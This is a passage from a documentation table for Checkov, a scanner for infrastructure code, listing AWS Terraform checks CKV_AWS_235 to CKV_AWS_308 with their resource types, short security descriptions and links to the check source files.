Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | -| 332 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | -| 333 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | -| 334 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | -| 335 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | -| 336 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | -| 337 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | -| 338 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | -| 339 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | -| 340 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | -| 341 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | -| 342 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | -| 343 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | -| 344 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 345 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 346 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 347 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 348 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | -| 349 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 350 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 351 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | -| 352 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | -| 353 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | -| 354 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | -| 355 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | -| 356 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | -| 357 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | -| 358 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 359 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | -| 360 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 361 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 362 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 363 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 364 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 365 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | -| 366 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | -| 367 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | -| 368 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | -| 369 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | -| 370 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | -| 371 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | -| 372 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | -| 373 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | -| 374 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | -| 375 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | -| 376 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | -| 377 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 378 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 379 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 380 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 381 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 382 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 383 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | -| 384 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | -| 385 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 386 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 387 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 388 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | -| 389 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | -| 390 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | -| 391 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | -| 392 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | -| 393 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | -| 394 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | -| 395 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | -| 396 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 397 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 398 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 399 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 400 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 401 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 402 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 403 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 404 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 405 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 406 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 407 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 408 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 409 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 410 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 411 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 412 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 413 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 414 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 415 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 416 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 417 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 418 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 419 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 420 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 421 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 422 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | -| 423 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | -| 424 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | -| 425 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | -| 426 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | -| 427 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | -| 428 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | -| 429 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | -| 430 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | -| 431 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | -| 432 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | -| 433 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | -| 434 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | -| 435 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | -| 436 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | -| 437 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | 